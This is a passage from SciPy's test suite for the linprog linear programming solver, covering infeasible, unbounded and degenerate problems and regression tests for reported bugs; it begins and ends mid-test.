A_eq = [[7, -2], [0, 1], [2, -2]]
b_eq = [14, 0, 3]
bounds = [(2, 2), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bounds_equal_no_presolve(self):
# There was a bug when a lower and upper bound were equal but
# presolve was not on to eliminate the variable. The bound
# was being converted to an equality constraint, but the bound
# was not eliminated, leading to issues in postprocessing.
c = [1, 2]
A_ub = [[1, 2], [1.1, 2.2]]
b_ub = [4, 8]
bounds = [(1, 2), (2, 2)]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_infeasible(res)
def test_zero_column_1(self):
m, n = 3, 4
np.random.seed(0)
c = np.random.rand(n)
c[1] = 1
A_eq = np.random.rand(m, n)
A_eq[:, 1] = 0
b_eq = np.random.rand(m)
A_ub = [[1, 0, 1, 1]]
b_ub = 3
bounds = [(-10, 10), (-10, 10), (-10, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-9.7087836730413404)
def test_zero_column_2(self):
np.random.seed(0)
m, n = 2, 4
c = np.random.rand(n)
c[1] = -1
A_eq = np.random.rand(m, n)
A_eq[:, 1] = 0
b_eq = np.random.rand(m)
A_ub = np.random.rand(m, n)
A_ub[:, 1] = 0
b_ub = np.random.rand(m)
bounds = (None, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
# Unboundedness detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_zero_row_1(self):
c = [1, 2, 3]
A_eq = [[0, 0, 0], [1, 1, 1], [0, 0, 0]]
b_eq = [0, 3, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=3)
def test_zero_row_2(self):
A_ub = [[0, 0, 0], [1, 1, 1], [0, 0, 0]]
b_ub = [0, 3, 0]
c = [1, 2, 3]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0)
def test_zero_row_3(self):
m, n = 2, 4
c = np.random.rand(n)
A_eq = np.random.rand(m, n)
A_eq[0, :] = 0
b_eq = np.random.rand(m)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_zero_row_4(self):
m, n = 2, 4
c = np.random.rand(n)
A_ub = np.random.rand(m, n)
A_ub[0, :] = 0
b_ub = -np.random.rand(m)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_eq_1(self):
c = [1, 1, 1, 2]
A_eq = [[1, 0, 0, 0], [0, 2, 0, 0], [1, 0, 0, 0], [1, 1, 1, 1]]
b_eq = [1, 2, 2, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_eq_2(self):
c = [1, 1, 1, 2]
A_eq = [[1, 0, 0, 0], [0, 2, 0, 0], [1, 0, 0, 0], [1, 1, 1, 1]]
b_eq = [1, 2, 1, 4]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=4)
def test_singleton_row_ub_1(self):
c = [1, 1, 1, 2]
A_ub = [[1, 0, 0, 0], [0, 2, 0, 0], [-1, 0, 0, 0], [1, 1, 1, 1]]
b_ub = [1, 2, -2, 4]
bounds = [(None, None), (0, None), (0, None), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_singleton_row_ub_2(self):
c = [1, 1, 1, 2]
A_ub = [[1, 0, 0, 0], [0, 2, 0, 0], [-1, 0, 0, 0], [1, 1, 1, 1]]
b_ub = [1, 2, -0.5, 4]
bounds = [(None, None), (0, None), (0, None), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0.5)
def test_infeasible(self):
# Test linprog response to an infeasible problem
c = [-1, -1]
A_ub = [[1, 0],
[0, 1],
[-1, -1]]
b_ub = [2, 2, -5]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_infeasible_inequality_bounds(self):
c = [1]
A_ub = [[2]]
b_ub = 4
bounds = (5, 6)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
# Infeasibility detected in presolve
if self.options.get('presolve', True):
assert_equal(res.nit, 0)
def test_unbounded(self):
# Test linprog response to an unbounded problem
c = np.array([1, 1]) * -1 # maximize
A_ub = [[-1, 1],
[-1, -1]]
b_ub = [-1, -2]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
def test_unbounded_below_no_presolve_corrected(self):
c = [1]
bounds = [(None, 1)]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c=c, bounds=bounds,
method=self.method,
options=o)
if self.method == "revised simplex":
# Revised simplex has a special pathway for no constraints.
assert_equal(res.status, 5)
else:
_assert_unbounded(res)
def test_unbounded_no_nontrivial_constraints_1(self):
"""
Test whether presolve pathway for detecting unboundedness after
constraint elimination is working.
"""
c = np.array([0, 0, 0, 1, -1, -1])
A_ub = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, -1]])
b_ub = np.array([2, -2, 0])
bounds = [(None, None), (None, None), (None, None),
(-1, 1), (-1, 1), (0, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
assert_equal(res.x[-1], np.inf)
assert_equal(res.message[:36], "The problem is (trivially) unbounded")
def test_unbounded_no_nontrivial_constraints_2(self):
"""
Test whether presolve pathway for detecting unboundedness after
constraint elimination is working.
"""
c = np.array([0, 0, 0, 1, -1, 1])
A_ub = np.array([[1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1]])
b_ub = np.array([2, -2, 0])
bounds = [(None, None), (None, None), (None, None),
(-1, 1), (-1, 1), (None, 0)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
assert_equal(res.x[-1], -np.inf)
assert_equal(res.message[:36], "The problem is (trivially) unbounded")
def test_cyclic_recovery(self):
# Test linprogs recovery from cycling using the Klee-Minty problem
# Klee-Minty https://www.math.ubc.ca/~israel/m340/kleemin3.pdf
c = np.array([100, 10, 1]) * -1 # maximize
A_ub = [[1, 0, 0],
[20, 1, 0],
[200, 20, 1]]
b_ub = [1, 100, 10000]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 0, 10000], atol=5e-6, rtol=1e-7)
def test_cyclic_bland(self):
# Test the effect of Bland's rule on a cycling problem
c = np.array([-10, 57, 9, 24.])
A_ub = np.array([[0.5, -5.5, -2.5, 9],
[0.5, -1.5, -0.5, 1],
[1, 0, 0, 0]])
b_ub = [0, 0, 1]
# copy the existing options dictionary but change maxiter
maxiter = 100
o = {key: val for key, val in self.options.items()}
o['maxiter'] = maxiter
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
if self.method == 'simplex' and not self.options.get('bland'):
# simplex cycles without Bland's rule
_assert_iteration_limit_reached(res, o['maxiter'])
else:
# other methods, including simplex with Bland's rule, succeed
_assert_success(res, desired_x=[1, 0, 1, 0])
# note that revised simplex skips this test because it may or may not
# cycle depending on the initial basis
def test_remove_redundancy_infeasibility(self):
# mostly a test of redundancy removal, which is carefully tested in
# test__remove_redundancy.py
m, n = 10, 10
c = np.random.rand(n)
A_eq = np.random.rand(m, n)
b_eq = np.random.rand(m)
A_eq[-1, :] = 2 * A_eq[-2, :]
b_eq[-1] *= -1
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
#################
# General Tests #
#################
def test_nontrivial_problem(self):
# Problem involves all constraint types,
# negative resource limits, and rounding issues.
c, A_ub, b_ub, A_eq, b_eq, x_star, f_star = nontrivial_problem()
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=f_star, desired_x=x_star)
def test_lpgen_problem(self):
# Test linprog with a rather large problem (400 variables,
# 40 constraints) generated by https://gist.github.com/denis-bz/8647461
A_ub, b_ub, c = lpgen_2d(20, 20)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-64.049494229)
def test_network_flow(self):
# A network flow problem with supply and demand at nodes
# and with costs along directed edges.
# https://www.princeton.edu/~rvdb/542/lectures/lec10.pdf
c = [2, 4, 9, 11, 4, 3, 8, 7, 0, 15, 16, 18]
n, p = -1, 1
A_eq = [
[n, n, p, 0, p, 0, 0, 0, 0, p, 0, 0],
[p, 0, 0, p, 0, p, 0, 0, 0, 0, 0, 0],
[0, 0, n, n, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, p, p, 0, 0, p, 0],
[0, 0, 0, 0, n, n, n, 0, p, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, n, n, 0, 0, p],
[0, 0, 0, 0, 0, 0, 0, 0, 0, n, n, n]]
b_eq = [0, 19, -16, 33, 0, 0, -36]
with suppress_warnings() as sup:
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=755, atol=1e-6, rtol=1e-7)
def test_network_flow_limited_capacity(self):
# A network flow problem with supply and demand at nodes
# and with costs and capacities along directed edges.
# http://blog.sommer-forst.de/2013/04/10/
c = [2, 2, 1, 3, 1]
bounds = [
[0, 4],
[0, 2],
[0, 2],
[0, 3],
[0, 5]]
n, p = -1, 1
A_eq = [
[n, n, 0, 0, 0],
[p, 0, n, n, 0],
[0, p, p, 0, n],
[0, 0, 0, p, p]]
b_eq = [-4, 0, 0, 4]
with suppress_warnings() as sup:
# this is an UmfpackWarning but I had trouble importing it
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "scipy.linalg.solve\nIll...")
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(OptimizeWarning, "Solving system with option...")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=14)
def test_simplex_algorithm_wikipedia_example(self):
# https://en.wikipedia.org/wiki/Simplex_algorithm#Example
c = [-2, -3, -4]
A_ub = [
[3, 2, 1],
[2, 5, 3]]
b_ub = [10, 15]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-20)
def test_enzo_example(self):
# https://github.com/scipy/scipy/issues/1779 lp2.py
#
# Translated from Octave code at:
# http://www.ecs.shimane-u.ac.jp/~kyoshida/lpeng.htm
# and placed under MIT licence by Enzo Michelangeli
# with permission explicitly granted by the original author,
# Prof. Kazunobu Yoshida
c = [4, 8, 3, 0, 0, 0]
A_eq = [
[2, 5, 3, -1, 0, 0],
[3, 2.5, 8, 0, -1, 0],
[8, 10, 4, 0, 0, -1]]
b_eq = [185, 155, 600]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=317.5,
desired_x=[66.25, 0, 17.5, 0, 183.75, 0],
atol=6e-6, rtol=1e-7)
def test_enzo_example_b(self):
# rescued from https://github.com/scipy/scipy/pull/218
c = [2.8, 6.3, 10.8, -2.8, -6.3, -10.8]
A_eq = [[-1, -1, -1, 0, 0, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 1]]
b_eq = [-0.5, 0.4, 0.3, 0.3, 0.3]
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-1.77,
desired_x=[0.3, 0.2, 0.0, 0.0, 0.1, 0.3])
def test_enzo_example_c_with_degeneracy(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 20
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(1, m + 1) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [0, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0, desired_x=np.zeros(m))
def test_enzo_example_c_with_unboundedness(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 50
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(m) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [0, 0]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_unbounded(res)
def test_enzo_example_c_with_infeasibility(self):
# rescued from https://github.com/scipy/scipy/pull/218
m = 50
c = -np.ones(m)
tmp = 2 * np.pi * np.arange(m) / (m + 1)
A_eq = np.vstack((np.cos(tmp) - 1, np.sin(tmp)))
b_eq = [1, 1]
o = {key: self.options[key] for key in self.options}
o["presolve"] = False
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=o)
_assert_infeasible(res)
def test_basic_artificial_vars(self):
# Problem is chosen to test two phase simplex methods when at the end
# of phase 1 some artificial variables remain in the basis.
# Also, for `method='simplex'`, the row in the tableau corresponding
# with the artificial variables is not all zero.
c = np.array([-0.1, -0.07, 0.004, 0.004, 0.004, 0.004])
A_ub = np.array([[1.0, 0, 0, 0, 0, 0], [-1.0, 0, 0, 0, 0, 0],
[0, -1.0, 0, 0, 0, 0], [0, 1.0, 0, 0, 0, 0],
[1.0, 1.0, 0, 0, 0, 0]])
b_ub = np.array([3.0, 3.0, 3.0, 3.0, 20.0])
A_eq = np.array([[1.0, 0, -1, 1, -1, 1], [0, -1.0, -1, 1, -1, 1]])
b_eq = np.array([0, 0])
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=0, desired_x=np.zeros_like(c),
atol=2e-6)
#################
# Bug Fix Tests #
#################
def test_bug_5400(self):
# https://github.com/scipy/scipy/issues/5400
bounds = [
(0, None),
(0, 100), (0, 100), (0, 100), (0, 100), (0, 100), (0, 100),
(0, 900), (0, 900), (0, 900), (0, 900), (0, 900), (0, 900),
(0, None), (0, None), (0, None), (0, None), (0, None), (0, None)]
f = 1 / 9
g = -1e4
h = -3.1
A_ub = np.array([
[1, -2.99, 0, 0, -3, 0, 0, 0, -1, -1, 0, -1, -1, 1, 1, 0, 0, 0, 0],
[1, 0, -2.9, h, 0, -3, 0, -1, 0, 0, -1, 0, -1, 0, 0, 1, 1, 0, 0],
[1, 0, 0, h, 0, 0, -3, -1, -1, 0, -1, -1, 0, 0, 0, 0, 0, 1, 1],
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -1],
[0, 1.99, -1, -1, 0, 0, 0, -1, f, f, 0, 0, 0, g, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 2, -1, -1, 0, 0, 0, -1, f, f, 0, g, 0, 0, 0, 0],
[0, -1, 1.9, 2.1, 0, 0, 0, f, -1, -1, 0, 0, 0, 0, 0, g, 0, 0, 0],
[0, 0, 0, 0, -1, 2, -1, 0, 0, 0, f, -1, f, 0, 0, 0, g, 0, 0],
[0, -1, -1, 2.1, 0, 0, 0, f, f, -1, 0, 0, 0, 0, 0, 0, 0, g, 0],
[0, 0, 0, 0, -1, -1, 2, 0, 0, 0, f, f, -1, 0, 0, 0, 0, 0, g]])
b_ub = np.array([
0.0, 0, 0, 100, 100, 100, 100, 100, 100, 900, 900, 900, 900, 900,
900, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0])
c = np.array([-1.0, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 0, 0, 0, 0, 0, 0])
with suppress_warnings() as sup:
sup.filter(OptimizeWarning,
"Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=-106.63507541835018)
def test_bug_6139(self):
# linprog(method='simplex') fails to find a basic feasible solution
# if phase 1 pseudo-objective function is outside the provided tol.
# https://github.com/scipy/scipy/issues/6139
# Note: This is not strictly a bug as the default tolerance determines
# if a result is "close enough" to zero and should not be expected
# to work for all cases.
c = np.array([1, 1, 1])
A_eq = np.array([[1., 0., 0.], [-1000., 0., - 1000.]])
b_eq = np.array([5.00000000e+00, -1.00000000e+04])
A_ub = -np.array([[0., 1000000., 1010000.]])
b_ub = -np.array([10000000.])
bounds = (None, None)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=14.95,
desired_x=np.array([5, 4.95, 5]))
def test_bug_6690(self):
# linprog simplex used to violate bound constraint despite reporting
# success.
# https://github.com/scipy/scipy/issues/6690
A_eq = np.array([[0, 0, 0, 0.93, 0, 0.65, 0, 0, 0.83, 0]])
b_eq = np.array([0.9626])
A_ub = np.array([
[0, 0, 0, 1.18, 0, 0, 0, -0.2, 0, -0.22],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0.43, 0, 0, 0, 0, 0, 0],
[0, -1.22, -0.25, 0, 0, 0, -2.06, 0, 0, 1.37],
[0, 0, 0, 0, 0, 0, 0, -0.25, 0, 0]
])
b_ub = np.array([0.615, 0, 0.172, -0.869, -0.022])
bounds = np.array([
[-0.84, -0.97, 0.34, 0.4, -0.33, -0.74, 0.47, 0.09, -1.45, -0.73],
[0.37, 0.02, 2.86, 0.86, 1.18, 0.5, 1.76, 0.17, 0.32, -0.15]
]).T
c = np.array([
-1.64, 0.7, 1.8, -1.06, -1.16, 0.26, 2.13, 1.53, 0.66, 0.28
])
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(OptimizeWarning,
"Solving system with option 'cholesky'")
sup.filter(OptimizeWarning, "Solving system with option 'sym_pos'")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
desired_fun = -1.19099999999
desired_x = np.array([0.3700, -0.9700, 0.3400, 0.4000, 1.1800,
0.5000, 0.4700, 0.0900, 0.3200, -0.7300])
_assert_success(res, desired_fun=desired_fun, desired_x=desired_x)
# Add small tol value to ensure arrays are less than or equal.
atol = 1e-6
assert_array_less(bounds[:, 0] - atol, res.x)
assert_array_less(res.x, bounds[:, 1] + atol)
def test_bug_7044(self):
# linprog simplex failed to "identify correct constraints" (?)
# leading to a non-optimal solution if A is rank-deficient.
# https://github.com/scipy/scipy/issues/7044
A_eq, b_eq, c, N = magic_square(3)
with suppress_warnings() as sup:
sup.filter(OptimizeWarning, "A_eq does not appear...")
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
desired_fun = 1.730550597
_assert_success(res, desired_fun=desired_fun)
assert_allclose(A_eq.dot(res.x), b_eq)
assert_array_less(np.zeros(res.x.size) - 1e-5, res.x)
def test_bug_7237(self):
# https://github.com/scipy/scipy/issues/7237
# linprog simplex "explodes" when the pivot value is very
# close to zero.
c = np.array([-1, 0, 0, 0, 0, 0, 0, 0, 0])
A_ub = np.array([
[1., -724., 911., -551., -555., -896., 478., -80., -293.],
[1., 566., 42., 937., 233., 883., 392., -909., 57.],
[1., -208., -894., 539., 321., 532., -924., 942., 55.],
[1., 857., -859., 83., 462., -265., -971., 826., 482.],
[1., 314., -424., 245., -424., 194., -443., -104., -429.],
[1., 540., 679., 361., 149., -827., 876., 633., 302.],
[0., -1., -0., -0., -0., -0., -0., -0., -0.],
[0., -0., -1., -0., -0., -0., -0., -0., -0.],
[0., -0., -0., -1., -0., -0., -0., -0., -0.],
[0., -0., -0., -0., -1., -0., -0., -0., -0.],
[0., -0., -0., -0., -0., -1., -0., -0., -0.],
[0., -0., -0., -0., -0., -0., -1., -0., -0.],
[0., -0., -0., -0., -0., -0., -0., -1., -0.],
[0., -0., -0., -0., -0., -0., -0., -0., -1.],
[0., 1., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 1., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 1., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 1., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 1., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 1.]
])
b_ub = np.array([
0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1.])
A_eq = np.array([[0., 1., 1., 1., 1., 1., 1., 1., 1.]])
b_eq = np.array([[1.]])
bounds = [(None, None)] * 9
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=108.568535, atol=1e-6)
def test_bug_8174(self):
# https://github.com/scipy/scipy/issues/8174
# The simplex method sometimes "explodes" if the pivot value is very
# close to zero.
A_ub = np.array([
[22714, 1008, 13380, -2713.5, -1116],
[-4986, -1092, -31220, 17386.5, 684],
[-4986, 0, 0, -2713.5, 0],
[22714, 0, 0, 17386.5, 0]])
b_ub = np.zeros(A_ub.shape[0])
c = -np.ones(A_ub.shape[1])
bounds = [(0, 1)] * A_ub.shape[1]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
if self.options.get('tol', 1e-9) < 1e-10 and self.method == 'simplex':
_assert_unable_to_find_basic_feasible_sol(res)
else:
_assert_success(res, desired_fun=-2.0080717488789235, atol=1e-6)
def test_bug_8174_2(self):
# Test supplementary example from issue 8174.
# https://github.com/scipy/scipy/issues/8174
# https://stackoverflow.com/questions/47717012/linprog-in-scipy-optimize-checking-solution
c = np.array([1, 0, 0, 0, 0, 0, 0])
A_ub = -np.identity(7)
b_ub = np.array([[-2], [-2], [-2], [-2], [-2], [-2], [-2]])
A_eq = np.array([
[1, 1, 1, 1, 1, 1, 0],
[0.3, 1.3, 0.9, 0, 0, 0, -1],
[0.3, 0, 0, 0, 0, 0, -2/3],
[0, 0.65, 0, 0, 0, 0, -1/15],
[0, 0, 0.3, 0, 0, 0, -1/15]
])
b_eq = np.array([[100], [0], [0], [0], [0]])
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(OptimizeWarning, "A_eq does not appear...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_fun=43.3333333331385)
def test_bug_8561(self):
# Test that pivot row is chosen correctly when using Bland's rule
# This was originally written for the simplex method with
# Bland's rule only, but it doesn't hurt to test all methods/options
# https://github.com/scipy/scipy/issues/8561
c = np.array([7, 0, -4, 1.5, 1.5])
A_ub = np.array([
[4, 5.5, 1.5, 1.0, -3.5],
[1, -2.5, -2, 2.5, 0.5],
[3, -0.5, 4, -12.5, -7],
[-1, 4.5, 2, -3.5, -2],
[5.5, 2, -4.5, -1, 9.5]])
b_ub = np.array([0, 0, 0, 0, 1])
res = linprog(c, A_ub=A_ub, b_ub=b_ub, options=self.options,
method=self.method)
_assert_success(res, desired_x=[0, 0, 19, 16/3, 29/3])
def test_bug_8662(self):
# linprog simplex used to report incorrect optimal results
# https://github.com/scipy/scipy/issues/8662
c = [-10, 10, 6, 3]
A_ub = [[8, -8, -4, 6],
[-8, 8, 4, -6],
[-4, 4, 8, -4],
[3, -3, -3, -10]]
b_ub = [9, -9, -9, -4]
bounds = [(0, None), (0, None), (0, None), (0, None)]
desired_fun = 36.0000000000
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res1 = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
# Set boundary condition as a constraint
A_ub.append([0, 0, -1, 0])
b_ub.append(0)
bounds[2] = (None, None)
with suppress_warnings() as sup:
if has_umfpack:
sup.filter(UmfpackWarning)
sup.filter(RuntimeWarning, "invalid value encountered")
sup.filter(LinAlgWarning)
res2 = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
rtol = 1e-5
_assert_success(res1, desired_fun=desired_fun, rtol=rtol)
_assert_success(res2, desired_fun=desired_fun, rtol=rtol)
def test_bug_8663(self):
# exposed a bug in presolve
# https://github.com/scipy/scipy/issues/8663
c = [1, 5]
A_eq = [[0, -7]]
b_eq = [-6]
bounds = [(0, None), (None, None)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[0, 6./7], desired_fun=5*6./7)
def test_bug_8664(self):
# interior-point has trouble with this when presolve is off
# tested for interior-point with presolve off in TestLinprogIPSpecific
# https://github.com/scipy/scipy/issues/8664
c = [4]
A_ub = [[2], [5]]
b_ub = [4, 4]
A_eq = [[0], [-8], [9]]
b_eq = [3, 2, 10]
with suppress_warnings() as sup:
sup.filter(RuntimeWarning)
sup.filter(OptimizeWarning, "Solving system with option...")
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_infeasible(res)
def test_bug_8973(self):
"""
Test whether bug described at:
https://github.com/scipy/scipy/issues/8973
was fixed.
"""
c = np.array([0, 0, 0, 1, -1])
A_ub = np.array([[1, 0, 0, 0, 0], [0, 1, 0, 0, 0]])
b_ub = np.array([2, -2])
bounds = [(None, None), (None, None), (None, None), (-1, 1), (-1, 1)]
res = linprog(c, A_ub, b_ub, A_eq, b_eq, bounds,
method=self.method, options=self.options)
_assert_success(res, desired_x=[2, -2, 0, -1, 1], desired_fun=-2)
def test_bug_8973_2(self):
"""
Additional test for:
https://github.com/scipy/scipy/issues/8973
suggested in
https://github.com/scipy/scipy/pull/8985
review by @antonior92
"""
c = np.zeros(1)
A_ub = np.array([[1]])
b_ub = np.array([-2])
bounds = (None, None)
